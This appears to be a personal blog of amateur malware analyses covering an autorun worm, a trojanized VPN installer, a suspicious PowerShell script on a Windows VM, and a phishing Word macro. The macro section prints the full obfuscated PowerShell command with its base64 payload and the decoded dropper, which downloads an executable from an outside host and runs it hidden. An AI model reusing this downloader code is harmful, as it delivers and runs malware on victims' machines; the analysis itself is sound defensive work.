Malware Analysis

by Anurag


VirusTotal: 

SHA256 – 9ff1c8e6d80ebf5626714362cbc55a53ba17038e841773d24fdc018891adb52e

Tools used for analysis: OllydbgWireSharkPEExplorer,

I started debugging using Ollydbg. The first warning I received is

“Module ‘AutoRUN_’ has entry point outside the code (as specified in the PE header). Maybe this file is self-extracting or self-modifying. Please keep it in mind when setting breakpoints!”

1.PNG

The executable file extracts HelpMe.exe file and copy it to C:\Windows\System32

6.PNG

2

Also it got extracted AUTORUN_INF.exe file at C:\ location. same location it create files

AUTORUN.ini file

4

3

AutoRun.exe file executes HelpMe.exe file.

This also adds HelpMe.exe file to Startup programs and rename shortcut icon to Soft

soft ink

StartUp

Behavior of this malware I observed is, this gets replicated itself and and creates/hides word, pdf, xsls and  pages document files under RecycleBin folder.

5

I also observed the HelpMe.exe keep changing location from C:\Windows\System32 to C:\Windows\SysWow64

I stopped my analysis here after spending 2 days as there are a lot of things this malware doing in background.

Thanks.

Advertisements

VirusTtoal

SHA-256 — 7c3e2a38dcacc3246409151ecdf283814611a8f9d98ed0e5996fb2615adc2cc2

I pulled the request for malware sample from Malshare for analysis and renamed the file with .exe extension.

Tools I used: Ollydbg, WireShark, PEExplorer,

I downloaded malware sample, opened in PE explorer, and found resource information

1

Before I start debugginh, I extracted the malware executable file using 7-zip. There were 2 vpn applications KVPN kerio application and openvpn.

extractedfile.PNG

On opening settings.ini file from above list, There was license owner information given as www. WebTune . ir

WebTune

I started debugging of malware executable in ollydbg. It shows the behavior of application, check below image.

exe files

Malware program got installed and location was

C:\Program Files (x86)\P3Filter v2.3714840114\SmartConnection.exe

It also added short cut file in start program menu.

StartupLocation.PNG

it also installed kerio vpn switch adapter on my virtual machine.

VPNInstalled.PNG

Wireshark packets showed, application is trying to connect to below URL and DNS is resolving to domain mycn .ir

domain — mycn. ir

DNS

smaconn_sm_https64_txt_1

Please post your suggestions to improve my analysis.

Thanks.


Recently I have download Windows 10 VM from Microsoft’s site. Today, in c:\ drive I saw a folder named BGinfo which I know I had not created.

After opening it saw two files,

BGInfoFolderStructure

In openssh.ps1  file found URL,

URL

After accessing URL, SSH setup executable file download. After searching URL in VirusTotal 

result shows, 2 AV detected it as Malware out of 62.

During the investigation I found, there is a BGinfo program added in Startup program. (I disabled it later).

BGInfoTaskManager.PNG

And SSH installed on the server and services running in task scheduler.

I ran procmon and netmon to analyze the behavior. I haven’t found any unusual activity/call/traffic from/to remote server and not found any process/executable running in background.

During the analysis I haven’t run this PowerShell script.

VirusTotal –  [Link here]


I had emailed a recruiter last year for a job opportunity. He reverted back year later with attachment and it was encrypted and provided password.

Email

Unzipped and looked for the properties of word document.

Email3

I analysed file using Oletools  and the result showed it as a suspicious file.

Email4

I found value (“1jwe7d7n1544”) in the Macro code (which is highlighted in yellow).

Email5

After debugging macro from word document, I got base64 string (below the screenshot).

Email6.PNG

cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAiACkAewANAAoAIAAgACAAIAAgAHQAcgB5AHsADQAKACAAIAAgACAAIAAkAHUAcgBpACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAIgBoAHQAdABwADoALwAvAHYAZQB1AGwAYQBsAG0AZgBmAHkAeQAuAGMAbwBtAHAAYQBuAHkALwBwAHUAZQB3AHAAeABtAGEAcwBsAC8AcwB1AG8AZQBwAHcAeABwAGEAbQB4AGEAcAB4AGwAYQBtAHMAbAB4AGQAbwAuAHAAaABwAD8AbAA9AHMAawBsAGkAbQBmADUALgBoAGEAcgB6ACIAKQANAAoAIAAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlACAAPQAgACQAbQAuAEkAbgB2AG8AawBlACgAJABpAG4AcwB0AGEAbgBjAGUALAAgACgAJAB1AHIAaQApACkAOwANAAoADQAKACAAIAAgACAAIAAkAHAAYQB0AGgAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAIgBDAG8AbQBtAG8AbgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ARABhAHQAYQAiACkAIAArACAAIgBcAFwAQgByAE0AdABqAC4AZQB4AGUAIgA7AA0ACgAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAcABhAHQAaAAsACAAJAByAGUAcwBwAG8AbgBzAGUAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAYwBsAHMAaQBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABHAHUAaQBkACAAJwBDADAAOABBAEYARAA5ADAALQBGADIAQQAxAC0AMQAxAEQAMQAtADgANAA1ADUALQAwADAAQQAwAEMAOQAxAEYAMwA4ADgAMAAnAA0ACgAgACAAIAAgACAAJAB0AHkAcABlACAAPQAgAFsAVAB5AHAAZQBdADoAOgBHAGUAdABUAHkAcABlAEYAcgBvAG0AQwBMAFMASQBEACgAJABjAGwAcwBpAGQAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQAIAA9ACAAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAHQAeQBwAGUAKQANAAoAIAAgACAAIAAgACQAbwBiAGoAZQBjAHQALgBEAG8AYwB1AG0AZQBuAHQALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACQAcABhAHQAaAAsACQAbgB1AGwALAAgACQAbgB1AGwALAAgACQAbgB1AGwALAAwACkADQAKAA0ACgAgACAAIAAgACAAfQBjAGEAdABjAGgAewB9AA0ACgAgACAAIAAgACAADQAKACAAIAB9AA0ACgB9AA0ACgANAAoARQB4AGkAdAA7AA0ACgANAAoA 

Converting base64 string, resulted in the below PowerShell code.

$instance = [System.Activator]::CreateInstance(“System.Net.WebClient”);
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq “DownloadData”){
try{
$uri = New-Object System.Uri(“http:// veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz”)
$response = $m.Invoke($instance, ($uri));
$path = [System.Environment]::GetFolderPath(“CommonApplicationData”) + “\\BrMtj.exe”;
[System.IO.File]::WriteAllBytes($path, $response);
$clsid = New-Object Guid ‘C08AFD90-F2A1-11D1-8455-00A0C91F3880’
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;

Behavior of Macro — 

  • Executes when word document opens.

Behavior of PowerShell script —

  • PowerShell script access URL  (http:// veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz)
  • It downloads executable file BrMtj.exe

Note: When i tried to access URL in browser, it was inaccessible.

Malware Sample on Virus Total — 

SHA256 — e4a959684cd6ea7248dc4d2ad0d5df2790ff217685c2a341d242a85b5808d720